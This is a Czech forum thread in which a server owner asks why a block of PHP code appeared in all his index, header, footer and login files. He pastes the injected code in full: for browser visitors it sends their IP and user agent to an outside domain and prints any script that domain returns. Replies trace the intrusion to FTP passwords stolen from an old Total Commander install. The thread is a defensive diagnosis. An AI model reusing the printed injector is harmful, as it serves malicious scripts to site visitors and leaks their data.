Do všech souborů index.php přibyl kus kódu. WTF?!

Vývojová prostředí, aplikace, skripty, http://www... síťové programy, internet, sdílení...
Odpovědět
Trinom
Středně pokročilý
Středně pokročilý
Kontaktovat uživatele:

Do všech souborů index.php přibyl kus kódu. WTF?!

Příspěvek od Trinom »

Zdravíčko, řeším takový nepříjemný problém na serveru. Do každého souboru index.php, header.php, footer.php a login.php mi před pár dny (15.5.) přibyl kus kódu

Kód: Vybrat vše

<?php
#7090da#
error_reporting(0); ini_set('display_errors',0); $wp_a6850 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_a6850) && !preg_match ('/bot/i', $wp_a6850))){
$wp_a096850="http://"."tag"."includes".".com/includes"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_a6850);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_a096850);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6850a = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_6850a,1,3) === 'scr' ){ echo $wp_6850a; }
#/7090da#
?>
<?php

?>
Netuší někdo, kde se to tam mohlo vzít a jak se proti tomu bránit? Je to i u dalších uživatelů, takže se to tam nejspíš nedostalo přes FTP. Díky
Obrázek Measure With Micrometer, Mark With Chalk, Cut With Ax.....................TDI = Ten Dým Ignoruj
CageJ
Moderátor
Moderátor
Kontaktovat uživatele:

Re: Do všech souborů index.php přibyl kus kódu. WTF?!

Příspěvek od CageJ »

tu na fore?
Je to wordpress alebo webphp?
AMD RYZEN 5600X, 16GB DDR4 2,8GHz, ASUS TUF B550, ASUS GOLD 650W; Fractal Design, ASUS DUAL RTX 3060 Ti GDDR6X;
AMD RYZEN 5800X3D, NOCTUA NH-D15, ASUS ProArt X570-CREATOR WIFI, SuperFlower 1200W, 32GB CL14 G.SKILL 3200, FRACTAL DESIGN XL R4, ASUS STRIX RTX 3080 OC; APPLE MacBook AIR M1
iPhone 12 Pro 128GB
Trinom
Středně pokročilý
Středně pokročilý
Kontaktovat uživatele:

Příspěvek od Trinom »

na mojem soukromém. neběží tam žádný RS.
Obrázek Measure With Micrometer, Mark With Chalk, Cut With Ax.....................TDI = Ten Dým Ignoruj
Sten
Žlutá karta Bazar
Žlutá karta Bazar

Příspěvek od Sten »

uložené heslo v total comanderu? :-)
Trinom
Středně pokročilý
Středně pokročilý
Kontaktovat uživatele:

Příspěvek od Trinom »

Myslíš, že to šlo z vnitřní sítě? Hesla v TC uložný mám, protože si je nepamatuju. Každopádně antivir, ani antispyware mi žádnej průser nehlásí.
Sten
Žlutá karta Bazar
Žlutá karta Bazar

Příspěvek od Sten »

už je to delší dobu, ale byl vir co napadal právě total comander a dostal se tak na FTP, a jak popisuješ, do indexů apod dával svůj kód - reklamy, popup a podobně.
Caderom
Začátečník
Začátečník

Příspěvek od Caderom »

S tímhle typem malwaru mají antiviry evidentně trochu problém. Taky mi ho antivir před lety detekoval až několik dní po nákaze a útoku na web.
Jey
Středně pokročilý
Středně pokročilý

Příspěvek od Jey »

Tak novější verze (poslední dva roky minimálně) Total commanderu již hesla nekóduje jako plain text (čistý text) a nejsou tedy zpětně čitelná. I když je myslím potřeba vyplnit si tam master heslo. To už je pak na každém, jak se zařídí..

Jinak ano, vypadá to na automatický hack (úpravu) všech php souborů od nějakého viru.

Zkus ty php soubory (jednotlivě) poslat na virustotal.com, tam už možná budou mít ten škodlivý kód v databázi. Ale prakticky je to jen běžný php kód, který otevře soubor z jiného webu s php kódem a spouští jej (tam už asi nějaké neechtovní operace budou).
Trinom
Středně pokročilý
Středně pokročilý
Kontaktovat uživatele:

Příspěvek od Trinom »

Tak jsem projel log Proftpd a opravdu šel útok přes FTP. Takže změnit hesla a přeinstalovat Total Commander za novou verzi (měl jsem starou). AVG na mojem PC samozřejmě našlo kulový, což mě trošku znepokojuje. Ví se, jak se ta ludra šíří?

Jestli chce někdo zašťourat po zdroji, tak útok přišel z IP 85.214.196.184 aka h2128165.stratoserver.net (sídlí v Belíně).

Co se dívám, tak si prolezl celou adresářovou strukturu a podíval se do všech php, html, swf a js souborů.
Odpovědět

Zpět na „Programování a web“